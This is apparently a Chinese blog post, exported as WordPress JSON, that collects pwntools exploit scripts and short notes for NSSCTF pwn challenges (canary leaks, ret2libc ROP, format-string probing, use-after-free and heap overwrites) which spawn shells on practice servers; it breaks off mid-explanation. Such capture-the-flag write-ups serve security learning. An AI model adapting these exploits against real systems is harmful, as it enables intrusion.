{"id":653,"date":"2025-12-09T11:15:13","date_gmt":"2025-12-09T03:15:13","guid":{"rendered":"https:\/\/www.okabe.xin\/wordpress\/?p=653"},"modified":"2025-12-13T13:56:12","modified_gmt":"2025-12-13T05:56:12","slug":"%e8%b6%85%e8%b6%85%e8%b6%85%e5%a4%a7%e6%9d%af%e6%9d%a5%e4%ba%86","status":"publish","type":"post","link":"https:\/\/www.okabe.xin\/wordpress\/?p=653","title":{"rendered":"\u8d85\u8d85\u8d85\u5927\u676f\u6765\u4e86"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">NSSCTF<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">[2021 \u9e64\u57ce\u676f]littleof<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>from LibcSearcher import *<br>context(os='linux', arch='amd64', log_level='debug')<br>\u200b<br>p = remote('node4.anna.nssctf.cn',28679)<br>\u200b<br>elf = ELF('.\/littleof')<br>\u200b<br>pop_rdi = 0x0400863<br>ret = 0x040059e<br>main_addr = 0x04006E2<br>puts_got = elf.got&#91;'puts']<br>puts_plt = elf.plt&#91;'puts']<br>\u200b<br>#\u83b7\u53d6canary\u5730\u5740<br>payload = b'a'*(0x50-9) + b'b' &nbsp;#\u8fd9\u91cc0x50-9\u591a\u51cf\u4e00\u4e2a1\u662f\u56e0\u4e3a\u65b9\u4fbf\u6211\u4eec\u5b9a\u4f4d<br>p.sendlineafter('Do you know how to do buffer overflow?', payload)<br>p.recvuntil(b'ab\\n')<br>canary_addr = u64(p.recv(7).rjust(8,b'\\x00')) #\u63a5\u6536anary\u5730\u5740\uff0c\u63a5\u65367\u4e2a\u5b57\u7b26\u4e32\u4e0d\u8db3\u516b\u4e2a\u7528\\x00\u8865\u9f50\u7136\u540e\u7528u64\u8fdb\u884c\u6253\u5305\uff08\u6ce8\u610f\u8fd9\u91cc\u662frjust\u4e5f\u5c31\u662f\u53f3\u5bf9\u9f50\u5b57\u7b26\u4e32\uff09<br>print(hex(canary_addr))<br>\u200b<br>\u200b<br>#\u6cc4\u9732got\u8868\u5730\u5740<br>payload2 = b'a' * (0x50-8) + p64(canary_addr) + p64(0) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr) #\u51cf\u53bbcanary\u518dbuf\u4e2d\u7684\u5927\u5c0f\u7136\u540e\u52a0\u4e0acanary\u5730\u5740\u518d\u52a0\u4e0a8\u4e2a\u5b57\u8282\u8986\u76d6\u5230\u8fd4\u56de\u5730\u5740\uff0c\u518d\u52a0\u4e0ardi\u5b58\u5165puts_got\u5730\u5740\u5f53\u4f5c\u53c2\u6570\u7136\u540e\u4f7f\u7528puts_plt\u8f93\u51faputs_got\u5730\u5740\u518d\u6267\u884cmain\u51fd\u6570<br>p.sendlineafter('Try harder!', payload2)<br>p.recvuntil(b'I hope you win')<br>puts_addrs = u64(p.recvuntil(b'\\x7f')&#91;-6:].ljust(8,b'\\x00')) #\u63a5\u6536puts\u51fd\u6570\u518dgot\u8868\u9879\u4e2d\u7684\u5730\u5740\uff0c\u4ece\\x7f\u5f00\u59cb\u5411\u540e\u63a5\u65366\u4e2a\u5b57\u7b26\uff0c\u4e0d\u8db38\u4e2a\u7528\\x00\u8865\u9f50\uff0c\uff08\u6ce8\u610f\u8fd9\u91cc\u662fljust\u4e5f\u5c31\u662f\u5de6\u5bf9\u9f50\uff09<br>print(hex(puts_addrs))<br>\u200b<br>#\u8ba1\u7b97\u51falibc\u57fa\u5730\u5740,\u6b64\u9898libc\u67e5\u8be2\u4e0d\u5230\uff01<br>'''<br>libc = LibcSearcher('puts', puts_addrs)<br>'''<br>libc_base = puts_addrs - 0x80aa0<br>systeam_addrs = libc_base + 0x4f550<br>bin_sh_addrs = libc_base + + 0x1b3e1a<br>\u200b<br>#\u91cd\u590d\u7b2c\u4e00\u4e2a\u6b65\u9aa4\u8fd9\u91cc\u518d\u6b21\u83b7\u53d6canary\u5730\u5740\u662f\u56e0\u4e3a\u6211\u4eec\u518d\u4e0a\u4e00\u6b21payload\u4e2d\u6700\u540e\u4e00\u6bb5\u5199\u5165\u4e86main\u51fd\u6570\u6240\u4ee5\u7a0b\u5e8f\u518d\u6267\u884c\u5b8c\u4e0a\u4e00\u6b21\u7684paylaod\u540e\u4f1a\u91cd\u65b0\u8fd0\u884c\u7a0b\u5e8f\u8fd9\u91cc\u5c31\u91cd\u5934\u5f00\u59cb\u4e86\uff0c\u53c8\u56e0\u4e3a\u7a0b\u5e8f\u662f\u9700\u8981\u8f93\u5165\u4e24\u6b21\u800c\u6211\u4eec\u53c8\u662f\u518d\u7b2c\u4e8c\u6b21\u8f93\u5165\u65f6\u8fdb\u884c\u6784\u9020payload\u8fd4\u56de\u5730\u5740\u6240\u4ee5\u6b64\u5904\u6211\u4eec\u5c31\u8981\u518d\u83b7\u53d6\u4e00\u6b21canary\u5730\u5740<br>payload3 = b'a'*(0x50-9) + b'b' &nbsp;#\u8fd9\u91cc0x50-9\u591a\u51cf\u4e00\u4e2a1\u662f\u56e0\u4e3a\u65b9\u4fbf\u6211\u4eec\u5b9a\u4f4d<br>p.sendlineafter('Do you know how to do buffer overflow?', payload3)<br>p.recvuntil(b'ab')<br>canary_addr2 = u64(p.recv(7).rjust(8,b'\\x00'))<br>print(hex(canary_addr2))<br>\u200b<br>#\u6784\u9020shellcode<br>payload4 = b'a' * (0x50-8) + p64(canary_addr) + p64(0) + p64(ret) + p64(pop_rdi) + p64(bin_sh_addrs) + p64(systeam_addrs) &nbsp;#\u6784\u9020\u7b2c\u4e8c\u6b21payload\u8fd9\u91cc\u6dfb\u52a0ret\u7684\u5730\u5740\u662f\u4e3a\u4e86\u4fdd\u8bc1\u6808\u5bf9\u9f50\u3002<br>p.sendlineafter('Try harder!', payload4)<br>\u200b<br>\u200b<br>p.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[LitCTF 2023]\u53e3\u7b97\u9898\u5361<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>io = remote(\"node4.anna.nssctf.cn\",28257)<br>io.recvuntil(b\"is \")<br>for i in range(100):<br> &nbsp;  io.recvuntil(b\"is \")<br> &nbsp;  a = io.recv()&#91;0:-2]<br> &nbsp;  a_text = a.decode()<br>\u200b<br> &nbsp;  result = eval(a_text)<br>\u200b<br> &nbsp;  io.sendline(str(result).encode())<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[WUSTCTF 2020]getshell2<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = remote('node5.anna.nssctf.cn', 20971)<br>sh = 0x08048670<br>call_sys = 0x8048529<br>payload = b'A'*(0x18+4) + p32(call_sys) +p32(sh)<br>io.sendline(payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 Week1]fmtstrre<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>#\u7206\u7834\u6cd5\uff0c\u4e0d\u591f\u4f18\u96c5\uff0c\u6709gdb\u8c03\u8bd5\u67e5\u5230\u662f0x20\u7684\u4f4d\u7f6e\uff0c\u7136\u540e\u52a0\u516d\u4e2a\u5bc4\u5b58\u5668\u5730\u5740\u7684\u8bf4\u6cd5<br>#0x20 = 32 &nbsp; || 32+6 = 38<br>#\u6240\u4ee5\u662f%38$s<br>from pwn import *<br>\u200b<br>\u200b<br>context.log_level = 'debug'<br>\u200b<br>host = 'node5.anna.nssctf.cn'<br>port = 23089<br>start = 1 &nbsp;# \u8d77\u59cb\u504f\u79fb\u91cf<br>\u200b<br>while True:<br> &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp;io = remote(host, port)<br> &nbsp; &nbsp; &nbsp; &nbsp;# \u63a5\u6536\u521d\u59cb\u63d0\u793a\u4fe1\u606f<br> &nbsp; &nbsp; &nbsp; &nbsp;io.recvuntil('Input your format string.')<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;# \u53d1\u9001\u5f53\u524d\u504f\u79fb\u91cf\u7684payload<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = f'%{start}$s'.encode()<br> &nbsp; &nbsp; &nbsp; &nbsp;io.sendline(payload)<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;# \u63a5\u6536\u54cd\u5e94<br> &nbsp; &nbsp; &nbsp; &nbsp;io.recvline() &nbsp;# \u63a5\u6536\"Ok.\"<br> &nbsp; &nbsp; &nbsp; &nbsp;res = io.recvline()<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f'Offset {start}: {res.decode().strip()}')<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;start += 1 &nbsp;# \u504f\u79fb\u91cf+1<br> &nbsp; &nbsp; &nbsp; &nbsp;io.close()<br>\u200b<br> &nbsp; &nbsp;except EOFError:<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f'\u65ad\u5f00\u8fde\u63a5\uff0c\u5c1d\u8bd5\u4e0b\u4e00\u4e2a\u504f\u79fb\u91cf: {start + 1}')<br> &nbsp; &nbsp; &nbsp; &nbsp;start += 1 &nbsp;# \u65ad\u8054\u540e\u504f\u79fb\u91cf+1<br> &nbsp; &nbsp; &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;io.close()<br> &nbsp; &nbsp; &nbsp; &nbsp;except:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pass<br> &nbsp; &nbsp;except Exception as e:<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f'\u9519\u8bef: {e}\uff0c\u7ee7\u7eed\u6d4b\u8bd5\u504f\u79fb\u91cf: {start}')<br> &nbsp; &nbsp; &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;io.close()<br> &nbsp; &nbsp; &nbsp; &nbsp;except:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pass<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[NISACTF 2022]UAF<\/h2>\n\n\n\n<p>main\u51fd\u6570\u7eaf\u6253\u5370\u83dc\u5355\u7684<\/p>\n\n\n\n<p>\u6ca1\u5565\u4e1c\u897f<\/p>\n\n\n\n<p>\u8fdb\u83dc\u5355\u64cd\u4f5c\u91cc\u770b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"740\" height=\"570\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-654\"  sizes=\"auto, (max-width: 740px) 100vw, 740px\" \/><\/div><\/figure>\n\n\n\n<p>\u770b\u5230\u8fd9\u91cc\u5bf9i = 0\u7684\u60c5\u51b5\u505a\u4e86\u4fdd\u62a4<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"710\" height=\"505\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-655\"  sizes=\"auto, (max-width: 710px) 100vw, 710px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"659\" height=\"449\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-656\"  sizes=\"auto, (max-width: 659px) 100vw, 659px\" \/><\/div><\/figure>\n\n\n\n<p>\u4ed4\u7ec6\u89c2\u5bdf\u540e\uff0c\u53d1\u73b0\u57fa\u672c\u4e0a\u90fd\u6709\u5305\u542b0\u7684\u60c5\u51b5\u5e76\u8fdb\u884c\u5904\u7406<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"600\" height=\"326\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-657\"  sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/div><\/figure>\n\n\n\n<p>\u4f46\u662fdel\u51fd\u6570\u6ca1\u6709\u5bf9i = 0\u8fdb\u884c\u5305\u542b\u5904\u7406<\/p>\n\n\n\n<p>\u524d\u9762\u7684\u5bf9i = 0\u7684\u60c5\u51b5\u8fdb\u884c\u5305\u542b\uff0c\u5bfc\u81f4\u4e86\u6211\u4eec\u65e0\u6cd5\u76f4\u63a5\u5bf9\u9875\u97620\u7684\u5185\u5bb9\u8fdb\u884cedit\u64cd\u4f5c<\/p>\n\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u9700\u8981\u5148\u7533\u8bf7\u4e00\u4e2a\uff0c\u7136\u540e\u91ca\u653e\u6389\uff0c\u56e0\u4e3a\u5b83\u6307\u9488\u6ca1\u7f6e\u96f6<\/p>\n\n\n\n<p>\u6240\u4ee5\u5f53\u6211\u4eec\u518d\u7533\u8bf7\u7684\u65f6\u5019\uff0c\u56e0\u4e3a\u5927\u5c0f\u662f\u4e00\u6837\u7684\uff0c\u6240\u4ee5\u8fd8\u662f\u539f\u6765\u7684\u90a3\u4e2a\u5806\u5757\uff0c\u90a3\u4e2a\u6307\u9488\u4e5f\u8fd8\u5728\uff0c\u8fd9\u4e2a\u65f6\u5019\u53ea\u8981\u6211\u4eec\u5bf9\u5176\u8fdb\u884cedit\u64cd\u4f5c\u7136\u540e\u7528show\u53bb\u5c55\u793a\u5185\u5bb9\uff0c\u5c31\u80fd\u5b8c\u6210getshell<\/p>\n\n\n\n<p>\u6b38\uff0c\u4e3a\u4ec0\u4e48\u5c31getshell\u4e86\uff0c\u56e0\u4e3a\u8fd9\u9898\u7ed9\u4e86system(command);<\/p>\n\n\n\n<p>\u6240\u4ee5\u8f6c\u5230getshell\u7684\u5730\u5740\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>\u56e0\u4e3apage \u5373 &amp;(page[0])\uff0cpage+1\u5373&amp;(page[1]) \uff0cfunc\u5728page[0]\u5411\u540e\u504f\u79fb4byte\u5904\uff0c\u6240\u4ee5argu\u4e0d\u80fd\u592a\u957f\uff0c\u5fc5\u987b\u5c0f\u4e8e4byte<\/p>\n\n\n\n<p>\u6240\u4ee5\u5728\u4f20\u5165\u8fdbshell\u7684\u547d\u4ee4\u65f6\uff0c\u8981\u6ce8\u610f\u6784\u9020\uff1a\u2019\/bin\/sh0x00\u2019\u592a\u957f\u4e86\uff0c\u6362\u6210\u2018sh\\x00\\x00\u2019\uff0c\u51714byte + getshell_addr<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\ncontext.log_level = 'debug'\nio = remote('node4.anna.nssctf.cn', 28245)\n\u200b\nbackdoor = 0x8048642\n\u200b\n\u200b\n# payload = b'sh\\x00\\x00' + p32(backdoor)\npayload = b'sh;\\00' + p32(backdoor)\n\u200b\ndef create():\n \u00a0 \u00a0io.sendline(b'1')\n\u200b\ndef delete():\n \u00a0 \u00a0io.sendline(b'3')\n \u00a0 \u00a0io.sendline(b'0')\n\u200b\ndef edit():\n \u00a0 \u00a0io.sendline(b'2')\n \u00a0 \u00a0io.sendline(b'1')\n \u00a0 \u00a0io.sendline(payload)\n\u200b\ndef show():\n \u00a0 \u00a0io.sendline(b'4')\n \u00a0 \u00a0io.sendline(b'0')\n\u200b\ncreate()\ndelete()\ncreate()\nedit()\nshow()\n\u200b\nio.interactive()\n\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[BJDCTF 2020]YDSneedGirlfriend<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>\u200b<br>\u200b<br>io = remote('node4.anna.nssctf.cn', 28929)<br>\u200b<br>\u200b<br>backdoor = 0x400B9C<br>payload = p64(backdoor)<br>\u200b<br>\u200b<br>def add(size, data):<br> &nbsp; &nbsp;io.sendline(b'1') &nbsp;# \u53d1\u9001\u9009\u98791<br> &nbsp; &nbsp;io.recvuntil(b'Her name size is :') &nbsp;# \u7b49\u5f85size\u8f93\u5165\u63d0\u793a<br> &nbsp; &nbsp;io.sendline(str(size).encode()) &nbsp;# \u53d1\u9001size<br> &nbsp; &nbsp;io.recvuntil(b'Her name is :') &nbsp;# \u7b49\u5f85name\u8f93\u5165\u63d0\u793a<br> &nbsp; &nbsp;io.sendline(data) &nbsp;# \u53d1\u9001name\u5185\u5bb9<br>\u200b<br>def delete(idx):<br> &nbsp; &nbsp;io.sendline(b'2') &nbsp;# \u53d1\u9001\u9009\u98792<br> &nbsp; &nbsp;io.recvuntil(b'Index :') &nbsp;# \u7b49\u5f85\u7d22\u5f15\u8f93\u5165\u63d0\u793a<br> &nbsp; &nbsp;io.sendline(str(idx).encode()) &nbsp;# \u53d1\u9001\u7d22\u5f15<br>\u200b<br>def show(idx):<br> &nbsp; &nbsp;io.sendline(b'3') &nbsp;# \u53d1\u9001\u9009\u98793<br> &nbsp; &nbsp;io.recvuntil(b'Index :') &nbsp;# \u7b49\u5f85\u7d22\u5f15\u8f93\u5165\u63d0\u793a<br> &nbsp; &nbsp;io.sendline(str(idx).encode()) &nbsp;# \u53d1\u9001\u7d22\u5f15<br>\u200b<br>\u200b<br># \u5229\u7528\u6d41\u7a0b\uff1a\u4e25\u683c\u6309\u5806\u5206\u914d\u903b\u8f91\u6267\u884c<br>add(0x30, b'aaa') &nbsp;# \u5206\u914d\u7b2c1\u4e2a\u5bf9\u8c61\uff08A0+B0\uff09<br>add(0x30, b'bbb') &nbsp;# \u5206\u914d\u7b2c2\u4e2a\u5bf9\u8c61\uff08A1+B1\uff09<br>delete(0) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u91ca\u653eA0\u548cB0\uff08UAF\uff09<br>delete(1) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u91ca\u653eA1\u548cB1\uff08UAF\uff09<br>\u200b<br># \u5206\u914d0x10\u5927\u5c0f\u7684B chunk\uff0c\u91cd\u7528A0\u7684\u5730\u5740\uff0c\u8986\u76d6\u51fd\u6570\u6307\u9488<br>add(0x10, payload)<br>\u200b<br>show(0) &nbsp;# \u89e6\u53d1\u88ab\u8986\u76d6\u7684\u51fd\u6570\u6307\u9488\uff0c\u6267\u884cbackdoor<br>\u200b<br>\u200b<br>io.interactive()<br>\u200b<br>\u200b<br>\u200b<br># from pwn import *<br># context.log_level = \"debug\"<br># io=remote('node4.anna.nssctf.cn',28254)<br>#<br>#<br># def add(size,data):<br># &nbsp; &nbsp; io.sendlineafter(\"Your choice :\", \"1\")<br># &nbsp; &nbsp; io.sendlineafter(\"Her name size is :\", str(size))<br># &nbsp; &nbsp; io.sendlineafter(\"Her name is :\", data)<br>#<br># def delete(index):<br># &nbsp; &nbsp; io.sendlineafter(\"Your choice :\", \"2\")<br># &nbsp; &nbsp; io.sendlineafter(\"Index :\", str(index))<br>#<br>#<br># def show(index):<br># &nbsp; &nbsp; io.sendlineafter(\"Your choice :\", \"3\")<br># &nbsp; &nbsp; io.sendlineafter(\"Index :\", str(index))<br>#<br># backdoor=0x400B9C<br>#<br># add(0x30,'aaa')<br># add(0x30,'bbb')<br>#<br># delete(0)<br># delete(1)<br>#<br># add(0x10,p64(backdoor))<br># show(0)<br># io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 Week1]ezr0p32<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io &nbsp;= remote('node5.anna.nssctf.cn', 26331)<br>\u200b<br>system = 0x080483D6<br>sh = 0x804A080<br>\u200b<br>payload1 = b'bin\/sh\\x00'<br>io.sendline(payload1)<br>\u200b<br>payload2 = b'a'*(28+4) + p32(system) + p32(0) +p32(sh)<br>io.sendline(payload2)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HDCTF 2023]Makewish<\/h2>\n\n\n\n<p>\u6808\u8fc1\u79fb + off by null + \u4f2a\u968f\u673a\u6570\uff0c\u4f2a\u968f\u673a\u6570\u80fd\u62ffgdb\u627e\u51fa\u6765<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>context(arch='amd64',log_level='debug')<br>\u200b<br> <br># gdb.attach(io)<br># raw_input()<br>while(1):<br> &nbsp; &nbsp;io=remote('node4.anna.nssctf.cn',28167)<br> &nbsp; &nbsp;io.recvuntil(b'name\\n\\n')<br> &nbsp; &nbsp;io.sendline(b'a'*39+b'b')<br> &nbsp; &nbsp;io.recvuntil(b'aaab')<br> &nbsp; &nbsp;canary=u64(io.recv(8))-0x0a<br> &nbsp; &nbsp;success(hex(canary))<br> <br> &nbsp; &nbsp;<br> &nbsp; &nbsp;num=707<br> &nbsp; &nbsp;io.send(p32(num))<br> <br> &nbsp; &nbsp;io.recvuntil(b'can make a wish to me\\n')<br> &nbsp; &nbsp;raw_input()<br> &nbsp; &nbsp;backdoor=0x4007C7<br> &nbsp; &nbsp;payload=p64(backdoor)*11+p64(canary)<br> &nbsp; &nbsp;io.send(payload)<br> &nbsp; &nbsp;raw_input()<br> <br> &nbsp; &nbsp;io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[NISACTF 2022]ezheap<\/h2>\n\n\n\n<p>\u5148\u76f4\u63a5exp\u8d77\u624b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>#io = process(\".\/ezheap\")<br>io = remote(\"node5.anna.nssctf.cn\",26582)<br>\u200b<br>payload = b'a'*28 + p32(0x21) +b'\/bin\/sh\\x00' <br>\u200b<br>#gdb.attach(io)<br>io.send(payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<p>\u8fd9\u9898\u7684\u610f\u4e49\u5c31\u5728\u4e8e\u5806\u7ba1\u7406\u673a\u5236\u7684\u5b66\u4e60<\/p>\n\n\n\n<p>\u5806\u8fd9\u4e2a\u4e1c\u897f\u5f88\u62bd\u8c61\uff08\u6211\u8ba4\u4e3a<\/p>\n\n\n\n<p>\u539f\u6837\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-4.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"660\" height=\"245\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-4.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-658\"  sizes=\"auto, (max-width: 660px) 100vw, 660px\" \/><\/div><\/figure>\n\n\n\n<p>\u5229\u7528\u6548\u679c\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-5.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"630\" height=\"225\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-5.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-659\"  sizes=\"auto, (max-width: 630px) 100vw, 630px\" \/><\/div><\/figure>\n\n\n\n<p>\u4f17\u6240\u4e0d\u5468\u77e5\u554a\uff0c32\u4f4d\u548c64\u4f4d\u5728\u7533\u8bf7\u5806\u5757\u7684\u65f6\u5019\u4f1a\u6709\u4e00\u4e9b\u5947\u5947\u602a\u602a\u7684\u4e8b\u60c5<\/p>\n\n\n\n<p>\u4e5f\u5c31\u662f\u7533\u8bf7\u5230\u7684\u5927\u5c0f\u548c\u5199\u7684\u7533\u8bf7\u5927\u5c0f\u4e0d\u4e00\u6837<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u7a0d\u5fae\u5199\u8be6\u7ec6\u4e00\u70b9\u5427<\/p>\n\n\n\n<p>\u7531\u4e8e\u5806\u7ba1\u7406\u673a\u5236\u7684\u95ee\u9898<\/p>\n\n\n\n<p>\u7528\u6237\u7533\u8bf7\u7684\u5927\u5c0f\uff0c\u4f1a\u5148\u5224\u65ad\u662f\u5426\u662f8\u7684\u500d\u6570<\/p>\n\n\n\n<p>\u5982\u679c\u662f\uff0c\u90a3\u5c31\u4e0d\u7ba1\u4e86\u5c31\u8fd9\u6837\u5427<\/p>\n\n\n\n<p>\u5982\u679c\u4e0d\u662f\u5c31\u8865\u8db3\u7a7a\u5b57\u8282\u4fdd\u8bc1\u6ee1\u8db3\u662f8\u7684\u500d\u6570\uff0c\u4ee5\u65b9\u4fbf\u8fdb\u884c\u5806\u7ba1\u7406<\/p>\n\n\n\n<p>\u7136\u540e\u8865\u8db3\u540e\uff0c32\u4f4d\